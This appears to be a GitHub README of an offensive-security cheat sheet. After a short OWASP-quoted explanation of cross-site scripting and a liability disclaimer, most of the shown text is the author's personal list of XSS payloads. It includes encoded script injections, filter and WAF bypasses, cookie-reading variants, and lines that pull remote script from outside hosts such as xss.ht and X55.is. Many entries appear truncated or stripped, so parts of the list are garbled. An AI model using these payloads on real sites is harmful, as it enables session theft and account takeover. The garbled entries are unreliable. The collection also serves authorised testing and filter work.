├── README.md └── assets ├── api-example.jpg ├── deserialization-diagram.jpg ├── forbidden.png ├── sqli-example.png └── xss-example.png /README.md: -------------------------------------------------------------------------------- 1 |

Offensive Security Miscellaneous!


5 | 6 | # Topics:
7 | 8 | > [XSS Related + Payload list](#--xss) 9 | 10 | > [SQLi Related + Payload list](#--sqli) 11 | 12 | > [cURL Related](#--curl-related) 13 | 14 | > [403 Bypassing](#--bypass-403-forbidden) 15 | 16 | > [Tools Related](#--tools) 17 | 18 | > [APIs](#--apis) 19 | 20 |
22 | 23 | # - XSS 24 | ● What is cross-site scripting (XSS)?
25 | 26 | Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script (JavaScript, etc.), to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. XSS can cause a variety of problems for the end user, ranging in severity from an annoyance to complete account compromise. 27 | XSS attacks may be conducted without using `<script>` tags: other HTML tags will do exactly the same thing, for example via event-handler attributes such as onmouseover, onerror, onload, etc. [(source)](https://owasp.org/www-community/attacks/xss/) 28 | 29 | XSS Attack example 30 | 31 |
32 | 33 | > Do not use the following XSS payloads against any random or unauthorized web application; I do not take any responsibility
34 | > for anyone who executes or exploits them on random endpoints and parameters — you have been warned! 35 | 36 | ## XSS Payloads (My personal collection)
39 | 🔴 Click to view my personal custom list of XSS Payloads 40 | 41 | ``` 42 | --- Important Note --- 43 | --- Please do consider that these payloads are used not for fuzzing nor to be added to a wordlist, --- 44 | --- there are many payloads here that would need additional actions to properly work. --- 45 | --- But of course, if you do wish to add some of them to a wordlist, then there's no problem at all! --- 46 | --- I also add commentary about every/most of the payloads in the commit history -- 47 | 48 | -%26apos; 50 | ">exemplo 51 | "">%27/---+{{77}}" 52 | ;// 53 | ;// 54 | 62 | "> 63 | %22on%3eerror=%22prompt(document.domain) 64 | %27%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 65 | %3Cscript%3Ealert(document.domain);%3C/script%3E 66 | -->

xss/ 67 | "onmouseover=alert(1)// 68 | %3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E 69 | 'onerror=%22alert%60kauenavarro%60%22testabcd))/ 70 | %3cscript%3eprompt(document.domain)%3c%2fscript%3e 71 | javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain 72 | 1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.domain%29%3C/ScRiPt%3E 73 | '"()%26%25alert(document.domain) 74 | '();}]9676"> 75 | "%20">%3 76 | %22%3E%3C%2Fa%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28document.cookie%29%3B%3E%3C%2Fscript%3E 77 | %3Cmarquee%20loop%3d1%20width%3d0%20onfinish%3dco\u006efirm(document.cookie)%3EXSS%3C%2fmarquee%3E 78 | "> 79 | javascript:alert(document.domain) 80 | %22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3B%3E 81 | %22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28POCkauenavarroxss%29%3E 82 | ;'"/'/>alert(1) 84 | 103 | <--` --!> 104 | javascript:{alert`0`} 105 | sussy 107 | 108 |

dragme 109 | 110 | 111 | 112 | 3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ 113 | 0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C 114 |
115 | "/>a 116 | clickme 118 | click 119 | hi 120 | 121 | anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz 122 | "/> 123 | .png 124 | ">.png 125 | ">.svg 126 | < 132 | \"> 143 | "> 161 | 162 | javascripT:eval('var a=document.createElement(\'script\'):a.src=\'https://ofjaaaah.xss.ht\':document.body.appendChild(a)') 163 | %3Cmarquee%20loop=1%20width=%271%26apos;%27onfinish=self[`al`+`ert`](1)%3E%23leet%3C/marquee%3E 164 | %3Cx%20y=1%20z=%271%26apos;%27onclick=self[`al`%2B`ert`](1)%3E%23CLICK%20MEE 165 | 0%3Bdata%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgUE9DbCIpPC9zY3JpcHQ%22HTTP-EQUIV%3D%22refresh%22 166 | xss> 169 | >

170 | 171 | 172 | 174 | %E2%80%A8%E2%80%A9confirm(1) 175 | ;confirm(document.domain)// 176 | ;onerror=alert;throw%201 177 | 178 | 179 | 180 | 181 | 182 | 183 | test 184 | test 185 | test 186 | 187 | javascript:/*--> 188 | ');} 189 | ">Click 190 |
191 | click 192 | 193 |
194 | X 195 | ">laod=alert> 196 | 197 | 198 | javascript:new%20Function`al\ert\`1\``; 199 | 200 | 201 | 203 | JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/* 204 | \74k 205 | "> 206 | "> 207 | "> 208 | "> 209 | Supremo-XSS">XSS 210 | Supremo-XSS"> 212 | "()%26%25N8Zn(9266) 213 |
214 | '`"> 215 |

216 | %0d%0a 217 | %0d%0amouseOver

218 | %3Ca+href=//X55.is+autofocus+onfocus=import(href)%3E 219 | 220 | -20a")});a=alert;a(1);// 221 | valor%0aalert(1)%3C/script%3E 222 | 223 | "/> 224 | "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 225 | 226 |

APTH 227 | "%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 228 | "> 229 | " onmouseenter=confirm(1)// 230 | '%20onmouseenter=confirm(1)// 231 | #alert(document.domain)// 232 | %22%27%22%3E%3CMETA%20HTTP-EQUIV%3Drefresh%20CONTENT%3D1%3E%3F%3D 233 |
Password:

<\!-- 234 |
235 | /(A('onerror=%22alert%601%60%22testabcd))/ 236 | /Orders/(A(%22onerror='alert%60xss%60'testabcd))/Login.aspx?ReturnUrl=/Orders 237 | (A(%22onerror='alert%601%60'testabcd))/Login.aspx?ReturnUrl=%2f 238 | "%20onmouseenter=confirm(document.domain)%20value=" 239 | '"onclick=(co\u006efirm)?.0>

240 | %22%3E%3CSvg/onload=confirm3// 241 | "> 242 | "><img src=x onerror=prompt(document.domain)> 243 | 244 | 245 | 246 | 248 | 250 | javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain 251 | %7B%7Bconstructor.constructor(%27confirm(document.domain)%27)()%7D%7D 252 | "> 253 | "document.body['innerHTML']=atob('PGltZyBzcmM9InRlc3RlLnBuZyIgb25lcnJvcj0iYWxlcnQod2luZG93Lm9yaWdpbikiPg==') 254 | %0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E 255 | %26%2302java%26%23115cript:alert(document.domain) 256 | ">Click%20me%0AXSS 257 | %3Cxss%20contenteditable%20onbeforeinput=alert(1)%3Etest 258 | %27%3E%0A%3C!--%3E%3Ca%20href=%22javascript:import(%27%2f%2fX55.is%27)%22%3ECLICK%3C/a%3E%0A%3C!--%3E 259 | %22bestxss=%3E%3Cxss%20contenteditable%20onbeforeinput=%22a='import(%60/%09/x55.is//%60)';b='javascript:';location=b%2Ba%22%3ESEARCHHERE%3C!--.html 260 |